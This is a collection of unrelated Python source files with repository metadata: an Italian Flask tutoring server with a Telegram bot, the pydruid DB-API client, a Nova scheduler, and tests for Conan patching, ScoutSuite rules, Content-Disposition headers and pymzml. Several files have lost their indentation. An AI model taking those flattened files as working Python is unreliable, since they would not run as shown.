dstring = dstring + u.username + ";"
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
for compito in u.impegno:
db.session.delete(compito)
if brasamail == "si":
res = sendemail(u.username, "Cancellazione utente",
"Gentile utente di Condivisione,\nIn vista dell'inizio di un nuovo anno scolastico, la sua utenza su Condivisione e' stata rimossa.\nPer tornare ad usufruire dei servizi di Condivisione, le sara' necessario creare una nuova utenza.\n\nGrazie per aver utilizzato Condivisione!\nQuesto messaggio è stato creato automaticamente.")
if not res:
print("Errore Invio ad indirizzo primario.")
sendemail(u.emailgenitore, "Cancellazione utente",
"Gentile utente di Condivisione,\nIn vista dell'inizio di un nuovo anno scolastico, la sua utenza su Condivisione e' stata rimossa.\nPer tornare ad usufruire dei servizi di Condivisione, le sara' necessario creare una nuova utenza.\n\nGrazie per aver utilizzato Condivisione!\nQuesto messaggio è stato creato automaticamente.")
db.session.delete(u)
db.session.commit()
dump = open("maildump.csv", 'w')
dump.write(dstring)
return redirect(url_for('page_dashboard'))
@app.route('/api/peer_request',
methods=['POST']) # Questa funzione sarà da rimpiazzare con un sistema che permetta il caricamento da CSV
def api_peer_request():
username = request.form.get("username")
password = request.form.get("password")
if not username or not password:
abort(403)
return
if login(username, password):
richiedente = find_user(username)
if richiedente.tipo < 2:
abort(403)
email = request.form.get("email")
materie = request.form.get("materie").split(",")
newpeer = find_user(email)
if newpeer.tipo > 0:
abort(403)
for materia in materie:
materia_nome, richiede = materia.split("|")
if richiede == '1':
materie_add = Materia.query.filter_by(nome=materia_nome).all()
for materia_singola in materie_add:
nuova_abilitazione = Abilitato(materia_singola.mid, newpeer.uid)
db.session.add(nuova_abilitazione)
newpeer.tipo = 1
db.session.commit()
return "200 - DATA SAVED TO DISK"
else:
abort(403)
def thread():
global bot
bot = telepot.Bot(telegramkey)
bot.getMe()
MessageLoop(bot, handle).run_as_thread()
@app.route('/botStart')
@rank_or_403(TipoUtente.PROF)
def page_bot():
processo = threading.Thread(target=thread)
processo.start()
print("Bot Telegram avviato. API in ascolto.")
return "Successo!"
# Bot
def handle(msg):
with app.app_context():
content_type, chat_type, chat_id = telepot.glance(msg)
username = "@"
username += msg['from']['username']
if content_type == 'text':
utenza = User.query.filter_by(telegram_chat_id=chat_id).all()
if not utenza:
accedi(chat_id, username)
else:
utente = utenza[0]
testo = msg['text']
if testo == "/aiuto":
bot.sendMessage(chat_id,
"I comandi disponibili sono:\n/aiuto - Lista comandi\n/impegni - Lista degli impegni\n")
elif testo == "/impegni":
query1 = text(
"SELECT impegno.*, materia.nome, materia.giorno_settimana, materia.ora, impegno.appuntamento, corso.limite, corso.occupati , corso.pid FROM impegno JOIN corso ON impegno.corso_id=corso.cid JOIN materia ON corso.materia_id = materia.mid JOIN user ON impegno.stud_id = user.uid WHERE corso.pid=:x;")
impegni = db.session.execute(query1, {"x": utente.uid}).fetchall()
query2 = text(
"SELECT impegno.*, materia.nome, materia.giorno_settimana, materia.ora, impegno.appuntamento, corso.limite, corso.occupati, corso.pid FROM impegno JOIN corso ON impegno.corso_id=corso.cid JOIN materia ON corso.materia_id = materia.mid JOIN user ON impegno.stud_id = user.uid WHERE impegno.stud_id=:x;")
lezioni = db.session.execute(query2, {"x": utente.uid}).fetchall()
messaggio = ""
if len(impegni) > 0:
messaggio += "Ecco i tuoi impegni:\n"
for impegno in impegni:
messaggio += "Materia: " + impegno[5] + " "
if impegno[8]:
messaggio += rendi_data_leggibile(impegno[8])
else:
if str(impegno[6]) == "1":
giorno = "Lunedì"
elif str(impegno[6]) == "2":
giorno = "Martedì"
elif str(impegno[6]) == "3":
giorno = "Mercoledì"
elif str(impegno[6]) == "4":
giorno = "Giovedì"
else:
giorno = "Venerdì"
ora = str(impegno[7])
messaggio += giorno + " " + ora + "\n"
if len(lezioni) > 0:
messaggio += "Ecco le ripetizioni che devi ricevere:\n"
for impegno in lezioni:
messaggio += "Materia: " + impegno[5] + " "
if impegno[8]:
messaggio += rendi_data_leggibile(impegno[8])
else:
if str(impegno[6]) == "1":
giorno = "Lunedì"
elif str(impegno[6]) == "2":
giorno = "Martedì"
elif str(impegno[6]) == "3":
giorno = "Mercoledì"
elif str(impegno[6]) == "4":
giorno = "Giovedì"
else:
giorno = "Venerdì"
ora = str(impegno[7])
messaggio += giorno + " " + ora + "\n"
if len(lezioni) == 0 and len(impegni) == 0:
messaggio += "Sembra che tu non abbia impegni. Beato te!"
bot.sendMessage(chat_id, messaggio)
def accedi(chat_id, username):
with app.app_context():
utenti = User.query.filter_by(telegram_username=username).all()
print(username)
if not utenti:
bot.sendMessage(chat_id,
"Si è verificato un problema con l'autenticazione. Assicurati di aver impostato correttamete il tuo username su Condivisione")
else:
bot.sendMessage(chat_id,
"Collegamento riuscito. D'ora in avanti, il bot ti avviserà ogni volta che un corso verrà creato e riepilogherà i tuoi impegni.\nPer dissociare questo account, visita Condivisione.\n\nPer visualizzare i comandi, digita /aiuto.")
utenti[0].telegram_chat_id = chat_id
db.session.commit()
if __name__ == "__main__":
    # Always add any missing tables to the database, without deleting the old ones
db.create_all()
nuovrecord = Log("Condivisione avviato. Condivisione è un programma di FermiTech Softworks.",
datetime.now())
print("Bot di Telegram avviato!")
db.session.add(nuovrecord)
db.session.commit()
app.run()
|
LBindustries/Condivisione-Fermi
|
server.py
|
Python
|
lgpl-3.0
| 43,211
|
from copy import deepcopy
from tests.unit_tests.monkey_island.cc.services.zero_trust.test_common.scoutsuite_finding_data import ( # noqa: E501
RULES,
)
from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_consts import (
RULE_LEVEL_DANGER,
RULE_LEVEL_WARNING,
)
from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_rule_service import (
ScoutSuiteRuleService,
)
example_scoutsuite_data = {
"checked_items": 179,
"compliance": None,
"dashboard_name": "Rules",
"description": "Security Group Opens All Ports to All",
"flagged_items": 2,
"items": [
"ec2.regions.eu-central-1.vpcs.vpc-0ee259b1a13c50229.security_groups.sg-035779fe5c293fc72"
".rules.ingress.protocols.ALL.ports.1-65535.cidrs.2.CIDR",
"ec2.regions.eu-central-1.vpcs.vpc-00015526b6695f9aa.security_groups.sg-019eb67135ec81e65"
".rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR",
],
"level": "danger",
"path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id"
".cidrs.id.CIDR",
"rationale": "It was detected that all ports in the security group are open, "
"and any source IP address"
" could send traffic to these ports, which creates a wider attack surface "
"for resources "
"assigned to it. Open ports should be reduced to the minimum needed to "
"correctly",
"references": [],
"remediation": None,
"service": "EC2",
}
def test_get_rule_from_rule_data():
assert ScoutSuiteRuleService.get_rule_from_rule_data(example_scoutsuite_data) == RULES[0]
def test_is_rule_dangerous():
test_rule = deepcopy(RULES[0])
assert ScoutSuiteRuleService.is_rule_dangerous(test_rule)
test_rule.level = RULE_LEVEL_WARNING
assert not ScoutSuiteRuleService.is_rule_dangerous(test_rule)
test_rule.level = RULE_LEVEL_DANGER
test_rule.items = []
assert not ScoutSuiteRuleService.is_rule_dangerous(test_rule)
def test_is_rule_warning():
test_rule = deepcopy(RULES[0])
assert not ScoutSuiteRuleService.is_rule_warning(test_rule)
test_rule.level = RULE_LEVEL_WARNING
assert ScoutSuiteRuleService.is_rule_warning(test_rule)
test_rule.items = []
assert not ScoutSuiteRuleService.is_rule_warning(test_rule)
|
guardicore/monkey
|
monkey/tests/unit_tests/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_rule_service.py
|
Python
|
gpl-3.0
| 2,287
|
import os
import patch_ng
import pytest
from conan.tools.files import patch, apply_conandata_patches
from conans.errors import ConanException
from conans.test.utils.mocks import ConanFileMock
class MockPatchset:
filename = None
string = None
apply_args = None
def apply(self, root, strip, fuzz):
self.apply_args = (root, strip, fuzz)
return True
@pytest.fixture
def mock_patch_ng(monkeypatch):
mock = MockPatchset()
def mock_fromfile(filename):
mock.filename = filename
return mock
def mock_fromstring(string):
mock.string = string
return mock
monkeypatch.setattr(patch_ng, "fromfile", mock_fromfile)
monkeypatch.setattr(patch_ng, "fromstring", mock_fromstring)
return mock
def test_single_patch_file(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.folders.set_base_source("/my_source")
conanfile.display_name = 'mocked/ref'
patch(conanfile, patch_file='patch-file')
assert mock_patch_ng.filename.replace("\\", "/") == '/my_source/patch-file'
assert mock_patch_ng.string is None
assert mock_patch_ng.apply_args == ("/my_source", 0, False)
assert len(str(conanfile.output)) == 0
def test_single_patch_file_from_forced_build(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.folders.set_base_source("/my_source")
conanfile.display_name = 'mocked/ref'
patch(conanfile, patch_file='/my_build/patch-file')
assert mock_patch_ng.filename == '/my_build/patch-file'
assert mock_patch_ng.string is None
assert mock_patch_ng.apply_args == ("/my_source", 0, False)
assert len(str(conanfile.output)) == 0
def test_base_path(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.folders.set_base_source("/my_source")
conanfile.display_name = 'mocked/ref'
patch(conanfile, patch_file='patch-file', base_path="subfolder")
assert mock_patch_ng.filename.replace("\\", "/") == '/my_source/patch-file'
assert mock_patch_ng.string is None
assert mock_patch_ng.apply_args == (os.path.join("/my_source", "subfolder"), 0, False)
assert len(str(conanfile.output)) == 0
def test_apply_in_build_from_patch_in_source(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.folders.set_base_source("/my_source")
conanfile.display_name = 'mocked/ref'
patch(conanfile, patch_file='patch-file', base_path="/my_build/subfolder")
assert mock_patch_ng.filename.replace("\\", "/") == '/my_source/patch-file'
assert mock_patch_ng.string is None
assert mock_patch_ng.apply_args[0] == os.path.join("/my_build", "subfolder").replace("\\", "/")
assert mock_patch_ng.apply_args[1] == 0
assert mock_patch_ng.apply_args[2] is False
assert len(str(conanfile.output)) == 0
def test_single_patch_string(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.folders.set_base_source("my_folder")
conanfile.display_name = 'mocked/ref'
patch(conanfile, patch_string='patch_string')
assert mock_patch_ng.string == b'patch_string'
assert mock_patch_ng.filename is None
assert mock_patch_ng.apply_args == ("my_folder", 0, False)
assert len(str(conanfile.output)) == 0
def test_single_patch_arguments(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.display_name = 'mocked/ref'
conanfile.folders.set_base_source("/path/to/sources")
patch(conanfile, patch_file='patch-file', strip=23, fuzz=True)
assert mock_patch_ng.filename.replace("\\", "/") == '/path/to/sources/patch-file'
assert mock_patch_ng.apply_args == ("/path/to/sources", 23, True)
assert len(str(conanfile.output)) == 0
def test_single_patch_type(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.display_name = 'mocked/ref'
patch(conanfile, patch_file='patch-file', patch_type='patch_type')
assert 'Apply patch (patch_type)\n' == str(conanfile.output)
def test_single_patch_description(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.display_name = 'mocked/ref'
patch(conanfile, patch_file='patch-file', patch_description='patch_description')
assert 'Apply patch: patch_description\n' == str(conanfile.output)
def test_single_patch_extra_fields(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.display_name = 'mocked/ref'
patch(conanfile, patch_file='patch-file', patch_type='patch_type',
patch_description='patch_description')
assert 'Apply patch (patch_type): patch_description\n' == str(conanfile.output)
def test_single_no_patchset(monkeypatch):
monkeypatch.setattr(patch_ng, "fromfile", lambda _: None)
conanfile = ConanFileMock()
conanfile.display_name = 'mocked/ref'
with pytest.raises(ConanException) as excinfo:
patch(conanfile, patch_file='patch-file-failed')
assert 'Failed to parse patch: patch-file-failed' == str(excinfo.value)
def test_single_apply_fail(monkeypatch):
class MockedApply:
def apply(self, *args, **kwargs):
return False
monkeypatch.setattr(patch_ng, "fromfile", lambda _: MockedApply())
conanfile = ConanFileMock()
conanfile.display_name = 'mocked/ref'
with pytest.raises(ConanException) as excinfo:
patch(conanfile, patch_file='patch-file-failed')
assert 'Failed to apply patch: patch-file-failed' == str(excinfo.value)
def test_multiple_no_version(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.display_name = 'mocked/ref'
conanfile.conan_data = {'patches': [
{'patch_file': 'patches/0001-buildflatbuffers-cmake.patch',
'base_path': 'source_subfolder', },
{'patch_file': 'patches/0002-implicit-copy-constructor.patch',
'base_path': 'source_subfolder',
'patch_type': 'backport',
'patch_source': 'https://github.com/google/flatbuffers/pull/5650',
'patch_description': 'Needed to build with modern clang compilers.'}
]}
apply_conandata_patches(conanfile)
assert 'Apply patch (backport): Needed to build with modern clang compilers.\n' \
== str(conanfile.output)
def test_multiple_with_version(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.display_name = 'mocked/ref'
conanfile.conan_data = {'patches': {
"1.11.0": [
{'patch_file': 'patches/0001-buildflatbuffers-cmake.patch',
'base_path': 'source_subfolder', },
{'patch_file': 'patches/0002-implicit-copy-constructor.patch',
'base_path': 'source_subfolder',
'patch_type': 'backport',
'patch_source': 'https://github.com/google/flatbuffers/pull/5650',
'patch_description': 'Needed to build with modern clang compilers.'}
],
"1.12.0": [
{'patch_file': 'patches/0001-buildflatbuffers-cmake.patch',
'base_path': 'source_subfolder', },
]}}
with pytest.raises(AssertionError) as excinfo:
apply_conandata_patches(conanfile)
assert 'Can only be applied if conanfile.version is already defined' == str(excinfo.value)
conanfile.version = "1.2.11"
apply_conandata_patches(conanfile)
assert len(str(conanfile.output)) == 0
conanfile.version = "1.11.0"
apply_conandata_patches(conanfile)
assert 'Apply patch (backport): Needed to build with modern clang compilers.\n' \
== str(conanfile.output)
|
conan-io/conan
|
conans/test/unittests/tools/files/test_patches.py
|
Python
|
mit
| 7,379
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function, division, absolute_import
from bgfiles.http import create_content_disposition
from django.test import SimpleTestCase
class CreateContentDispositionTest(SimpleTestCase):
def test(self):
header = create_content_disposition('Fußball.pdf')
self.assertEqual(b'attachment; filename="Fuball.pdf"; filename*=UTF-8\'\'Fu%C3%9Fball.pdf', header)
header = create_content_disposition('Fußball.pdf', attachment=False)
self.assertEqual(b'inline; filename="Fuball.pdf"; filename*=UTF-8\'\'Fu%C3%9Fball.pdf', header)
header = create_content_disposition(b'Fussball.pdf')
self.assertEqual(b'attachment; filename="Fussball.pdf"', header)
header = create_content_disposition(b'Fussball.pdf', attachment=False)
self.assertEqual(b'inline; filename="Fussball.pdf"', header)
expected = (b'attachment; filename="Leery Jenkins My Man .pdf"; '
b'filename*=UTF-8\'\'L%C3%A9%C3%ABr%C5%93%C3%B8y%20%20Jenkins%20%20My%20Man%20.pdf')
self.assertEqual(create_content_disposition('Léërœøy \\Jenkins/"My Man".pdf'), expected)
expected = (b'inline; filename="Leery Jenkins My Man .pdf"; '
b'filename*=UTF-8\'\'L%C3%A9%C3%ABr%C5%93%C3%B8y%20%20Jenkins%20%20My%20Man%20.pdf')
self.assertEqual(create_content_disposition('Léërœøy \\Jenkins/"My Man".pdf', attachment=False), expected)
|
climapulse/dj-bgfiles
|
tests/test_http.py
|
Python
|
bsd-3-clause
| 1,483
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.conf.urls.defaults import patterns, url
urlpatterns = patterns('about.views',
url(r'^$', 'admin_wizard', name='index'),
url(r'^admin_wizard$', 'admin_wizard', name='admin_wizard'),
url(r'^collect_usage$', 'collect_usage', name='collect_usage'),
)
|
2013Commons/HUE-SHARK
|
apps/about/src/about/urls.py
|
Python
|
apache-2.0
| 1,059
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import namedtuple, OrderedDict
import itertools
import json
from six import string_types
from six.moves.urllib import parse
import requests
from pydruid.db import exceptions
class Type(object):
STRING = 1
NUMBER = 2
BOOLEAN = 3
def connect(
host="localhost",
port=8082,
path="/druid/v2/sql/",
scheme="http",
user=None,
password=None,
context=None,
header=False,
ssl_verify_cert=True,
ssl_client_cert=None,
proxies=None,
): # noqa: E125
"""
Constructor for creating a connection to the database.
>>> conn = connect('localhost', 8082)
>>> curs = conn.cursor()
"""
context = context or {}
return Connection(
host,
port,
path,
scheme,
user,
password,
context,
header,
ssl_verify_cert,
ssl_client_cert,
proxies,
)
def check_closed(f):
"""Decorator that checks if connection/cursor is closed."""
def g(self, *args, **kwargs):
if self.closed:
raise exceptions.Error(
"{klass} already closed".format(klass=self.__class__.__name__)
)
return f(self, *args, **kwargs)
return g
def check_result(f):
"""Decorator that checks if the cursor has results from `execute`."""
def g(self, *args, **kwargs):
if self._results is None:
raise exceptions.Error("Called before `execute`")
return f(self, *args, **kwargs)
return g
def get_description_from_row(row):
"""
Return description from a single row.
We only return the name, type (inferred from the data) and if the values
can be NULL. String columns in Druid are NULLable. Numeric columns are NOT
NULL.
"""
return [
(
name, # name
get_type(value), # type_code
None, # [display_size]
None, # [internal_size]
None, # [precision]
None, # [scale]
get_type(value) == Type.STRING, # [null_ok]
)
for name, value in row.items()
]
def get_type(value):
"""
Infer type from value.
Note that bool is a subclass of int so order of statements matter.
"""
if isinstance(value, string_types) or value is None:
return Type.STRING
elif isinstance(value, bool):
return Type.BOOLEAN
elif isinstance(value, (int, float)):
return Type.NUMBER
raise exceptions.Error("Value of unknown type: {value}".format(value=value))
class Connection(object):
"""Connection to a Druid database."""
def __init__(
self,
host="localhost",
port=8082,
path="/druid/v2/sql/",
scheme="http",
user=None,
password=None,
context=None,
header=False,
ssl_verify_cert=True,
ssl_client_cert=None,
proxies=None,
):
netloc = "{host}:{port}".format(host=host, port=port)
self.url = parse.urlunparse((scheme, netloc, path, None, None, None))
self.context = context or {}
self.closed = False
self.cursors = []
self.header = header
self.user = user
self.password = password
self.ssl_verify_cert = ssl_verify_cert
self.ssl_client_cert = ssl_client_cert
self.proxies = proxies
@check_closed
def close(self):
"""Close the connection now."""
self.closed = True
for cursor in self.cursors:
try:
cursor.close()
except exceptions.Error:
pass # already closed
@check_closed
def commit(self):
"""
Commit any pending transaction to the database.
Not supported.
"""
pass
@check_closed
def cursor(self):
"""Return a new Cursor Object using the connection."""
cursor = Cursor(
self.url,
self.user,
self.password,
self.context,
self.header,
self.ssl_verify_cert,
self.ssl_client_cert,
self.proxies,
)
self.cursors.append(cursor)
return cursor
@check_closed
def execute(self, operation, parameters=None):
cursor = self.cursor()
return cursor.execute(operation, parameters)
def __enter__(self):
return self.cursor()
def __exit__(self, *exc):
self.close()
class Cursor(object):
"""Connection cursor."""
def __init__(
self,
url,
user=None,
password=None,
context=None,
header=False,
ssl_verify_cert=True,
proxies=None,
ssl_client_cert=None,
):
self.url = url
self.context = context or {}
self.header = header
self.user = user
self.password = password
self.ssl_verify_cert = ssl_verify_cert
self.ssl_client_cert = ssl_client_cert
self.proxies = proxies
# This read/write attribute specifies the number of rows to fetch at a
# time with .fetchmany(). It defaults to 1 meaning to fetch a single
# row at a time.
self.arraysize = 1
self.closed = False
# this is updated only after a query
self.description = None
        # this is set to an iterator after a successful query
self._results = None
@property
@check_result
@check_closed
def rowcount(self):
# consume the iterator
results = list(self._results)
n = len(results)
self._results = iter(results)
return n
@check_closed
def close(self):
"""Close the cursor."""
self.closed = True
@check_closed
def execute(self, operation, parameters=None):
query = apply_parameters(operation, parameters)
results = self._stream_query(query)
# `_stream_query` returns a generator that produces the rows; we need to
# consume the first row so that `description` is properly set, so let's
# consume it and insert it back if it is not the header.
try:
first_row = next(results)
self._results = (
results if self.header else itertools.chain([first_row], results)
)
except StopIteration:
self._results = iter([])
return self
@check_closed
def executemany(self, operation, seq_of_parameters=None):
raise exceptions.NotSupportedError(
"`executemany` is not supported, use `execute` instead"
)
@check_result
@check_closed
def fetchone(self):
"""
Fetch the next row of a query result set, returning a single sequence,
or `None` when no more data is available.
"""
try:
return self.next()
except StopIteration:
return None
@check_result
@check_closed
def fetchmany(self, size=None):
"""
Fetch the next set of rows of a query result, returning a sequence of
sequences (e.g. a list of tuples). An empty sequence is returned when
no more rows are available.
"""
size = size or self.arraysize
return list(itertools.islice(self._results, size))
@check_result
@check_closed
def fetchall(self):
"""
Fetch all (remaining) rows of a query result, returning them as a
sequence of sequences (e.g. a list of tuples). Note that the cursor's
arraysize attribute can affect the performance of this operation.
"""
return list(self._results)
@check_closed
def setinputsizes(self, sizes):
# not supported
pass
@check_closed
def setoutputsizes(self, sizes):
# not supported
pass
@check_closed
def __iter__(self):
return self
@check_closed
def __next__(self):
return next(self._results)
next = __next__
def _stream_query(self, query):
"""
Stream rows from a query.
This method will yield rows as the data is returned in chunks from the
server.
"""
self.description = None
headers = {"Content-Type": "application/json"}
payload = {"query": query, "context": self.context, "header": self.header}
auth = (
requests.auth.HTTPBasicAuth(self.user, self.password) if self.user else None
)
r = requests.post(
self.url,
stream=True,
headers=headers,
json=payload,
auth=auth,
verify=self.ssl_verify_cert,
cert=self.ssl_client_cert,
proxies=self.proxies,
)
if r.encoding is None:
r.encoding = "utf-8"
# raise any error messages
if r.status_code != 200:
try:
payload = r.json()
except Exception:
payload = {
"error": "Unknown error",
"errorClass": "Unknown",
"errorMessage": r.text,
}
msg = "{error} ({errorClass}): {errorMessage}".format(**payload)
raise exceptions.ProgrammingError(msg)
        # Druid will stream the data in chunks of 8k bytes, splitting the JSON
        # objects between them; setting `chunk_size` to `None` makes requests
        # use whatever chunk size the server sends
chunks = r.iter_content(chunk_size=None, decode_unicode=True)
Row = None
for row in rows_from_chunks(chunks):
# update description
if self.description is None:
self.description = (
list(row.items()) if self.header else get_description_from_row(row)
)
# return row in namedtuple
if Row is None:
Row = namedtuple("Row", row.keys(), rename=True)
yield Row(*row.values())
def rows_from_chunks(chunks):
"""
A generator that yields rows from JSON chunks.
Druid will return the data in chunks, but they are not aligned with the
JSON objects. This function will parse all complete rows inside each chunk,
yielding them as soon as possible.
"""
body = ""
for chunk in chunks:
if chunk:
body = "".join((body, chunk))
# find last complete row
boundary = 0
brackets = 0
in_string = False
for i, char in enumerate(body):
if char == '"':
if not in_string:
in_string = True
elif body[i - 1] != "\\":
in_string = False
if in_string:
continue
if char == "{":
brackets += 1
elif char == "}":
brackets -= 1
if brackets == 0 and i > boundary:
boundary = i + 1
rows = body[:boundary].lstrip("[,")
body = body[boundary:]
for row in json.loads(
"[{rows}]".format(rows=rows), object_pairs_hook=OrderedDict
):
yield row
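# Illustrative sketch, not part of the upstream pydruid module: rows_from_chunks
# reassembles complete JSON objects even when a chunk boundary falls in the
# middle of one, so both rows below come out intact. The helper name is
# hypothetical and exists only for this example.
def _rows_from_chunks_example():
    chunks = iter(['[{"a": 1}, {"a"', ': 2}]'])
    assert list(rows_from_chunks(chunks)) == [{"a": 1}, {"a": 2}]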
def apply_parameters(operation, parameters):
if not parameters:
return operation
escaped_parameters = {key: escape(value) for key, value in parameters.items()}
return operation % escaped_parameters
def escape(value):
"""
Escape the parameter value.
Note that bool is a subclass of int so order of statements matter.
"""
if value == "*":
return value
elif isinstance(value, string_types):
return "'{}'".format(value.replace("'", "''"))
elif isinstance(value, bool):
return "TRUE" if value else "FALSE"
elif isinstance(value, (int, float)):
return value
elif isinstance(value, (list, tuple)):
return ", ".join(escape(element) for element in value)
|
kawamon/hue
|
desktop/core/ext-py/pydruid-0.5.11/pydruid/db/api.py
|
Python
|
apache-2.0
| 12,084
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2010 Openstack, LLC.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Simple Scheduler
"""
from nova import db
from nova import flags
from nova import utils
from nova.scheduler import driver
from nova.scheduler import chance
FLAGS = flags.FLAGS
flags.DEFINE_integer("max_cores", 16,
"maximum number of instance cores to allow per host")
flags.DEFINE_integer("max_gigabytes", 10000,
"maximum number of volume gigabytes to allow per host")
flags.DEFINE_integer("max_networks", 1000,
"maximum number of networks to allow per host")
class SimpleScheduler(chance.ChanceScheduler):
"""Implements Naive Scheduler that tries to find least loaded host."""
def _schedule_instance(self, context, instance_id, *_args, **_kwargs):
"""Picks a host that is up and has the fewest running instances."""
instance_ref = db.instance_get(context, instance_id)
if (instance_ref['availability_zone']
and ':' in instance_ref['availability_zone']
and context.is_admin):
zone, _x, host = instance_ref['availability_zone'].partition(':')
service = db.service_get_by_args(context.elevated(), host,
'nova-compute')
if not self.service_is_up(service):
raise driver.WillNotSchedule(_("Host %s is not alive") % host)
# TODO(vish): this probably belongs in the manager, if we
# can generalize this somehow
now = utils.utcnow()
db.instance_update(context, instance_id, {'host': host,
'scheduled_at': now})
return host
results = db.service_get_all_compute_sorted(context)
for result in results:
(service, instance_cores) = result
if instance_cores + instance_ref['vcpus'] > FLAGS.max_cores:
raise driver.NoValidHost(_("All hosts have too many cores"))
if self.service_is_up(service):
# NOTE(vish): this probably belongs in the manager, if we
# can generalize this somehow
now = utils.utcnow()
db.instance_update(context,
instance_id,
{'host': service['host'],
'scheduled_at': now})
return service['host']
raise driver.NoValidHost(_("Scheduler was unable to locate a host"
" for this request. Is the appropriate"
" service running?"))
def schedule_run_instance(self, context, instance_id, *_args, **_kwargs):
return self._schedule_instance(context, instance_id, *_args, **_kwargs)
def schedule_start_instance(self, context, instance_id, *_args, **_kwargs):
return self._schedule_instance(context, instance_id, *_args, **_kwargs)
def schedule_create_volume(self, context, volume_id, *_args, **_kwargs):
"""Picks a host that is up and has the fewest volumes."""
volume_ref = db.volume_get(context, volume_id)
if (volume_ref['availability_zone']
and ':' in volume_ref['availability_zone']
and context.is_admin):
zone, _x, host = volume_ref['availability_zone'].partition(':')
service = db.service_get_by_args(context.elevated(), host,
'nova-volume')
if not self.service_is_up(service):
raise driver.WillNotSchedule(_("Host %s not available") % host)
# TODO(vish): this probably belongs in the manager, if we
# can generalize this somehow
now = utils.utcnow()
db.volume_update(context, volume_id, {'host': host,
'scheduled_at': now})
return host
results = db.service_get_all_volume_sorted(context)
for result in results:
(service, volume_gigabytes) = result
if volume_gigabytes + volume_ref['size'] > FLAGS.max_gigabytes:
raise driver.NoValidHost(_("All hosts have too many "
"gigabytes"))
if self.service_is_up(service):
# NOTE(vish): this probably belongs in the manager, if we
# can generalize this somehow
now = utils.utcnow()
db.volume_update(context,
volume_id,
{'host': service['host'],
'scheduled_at': now})
return service['host']
raise driver.NoValidHost(_("Scheduler was unable to locate a host"
" for this request. Is the appropriate"
" service running?"))
def schedule_set_network_host(self, context, *_args, **_kwargs):
"""Picks a host that is up and has the fewest networks."""
results = db.service_get_all_network_sorted(context)
for result in results:
(service, instance_count) = result
if instance_count >= FLAGS.max_networks:
raise driver.NoValidHost(_("All hosts have too many networks"))
if self.service_is_up(service):
return service['host']
raise driver.NoValidHost(_("Scheduler was unable to locate a host"
" for this request. Is the appropriate"
" service running?"))
|
nii-cloud/dodai-compute
|
nova/scheduler/simple.py
|
Python
|
apache-2.0
| 6,448
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Part of pymzml test cases
"""
import os
import pymzml.run as run
import unittest
from pymzml.spec import Spectrum, Chromatogram
import test_file_paths
class runTest(unittest.TestCase):
"""
"""
def setUp(self):
"""
"""
self.paths = test_file_paths.paths
file_compressed_indexed = self.paths[2]
file_compressed_unindexed = self.paths[1]
file_uncompressed_indexed = self.paths[0]
file_uncompressed_unindexed = self.paths[0]
file_bad_obo_version = self.paths[10]
file_no_obo_version = self.paths[11]
self.reader_compressed_indexed = run.Reader(file_compressed_indexed)
self.reader_compressed_unindexed = run.Reader(file_compressed_unindexed)
self.reader_uncompressed_indexed = run.Reader(file_uncompressed_indexed)
self.reader_uncompressed_unindexed = run.Reader(file_uncompressed_unindexed)
self.reader_bad_obo_version = run.Reader(file_bad_obo_version)
self.reader_set_obo_version = run.Reader(
file_bad_obo_version, obo_version="3.25.0"
)
self.reader_set_year_obo_version = run.Reader(
file_uncompressed_indexed, obo_version="23:06:2017"
)
self.reader_set_bad_obo_version = run.Reader(
file_uncompressed_indexed, obo_version="bad_obo_version"
)
self.reader_set_no_obo_version = run.Reader(file_no_obo_version)
def test_with_context(self):
with run.Reader(self.paths[0]) as reader:
reader[2]
def test_determine_file_encoding(self):
"""
"""
encoding = self.reader_compressed_indexed._determine_file_encoding(
self.paths[2]
)
self.assertEqual(encoding, "ISO-8859-1")
encoding = self.reader_compressed_unindexed._determine_file_encoding(
self.paths[1]
)
self.assertEqual(encoding, "ISO-8859-1")
encoding = self.reader_uncompressed_indexed._determine_file_encoding(
self.paths[3]
)
self.assertEqual(encoding, "ISO-8859-1")
encoding = self.reader_uncompressed_unindexed._determine_file_encoding(
self.paths[0]
)
self.assertEqual(encoding, "ISO-8859-1")
def test_init_iter(self):
"""
"""
mzml_version = self.reader_compressed_indexed.info["mzml_version"]
obo_version = self.reader_compressed_indexed.info["obo_version"]
spec_count = self.reader_compressed_indexed.info["spectrum_count"]
run_id = self.reader_uncompressed_unindexed.info["run_id"]
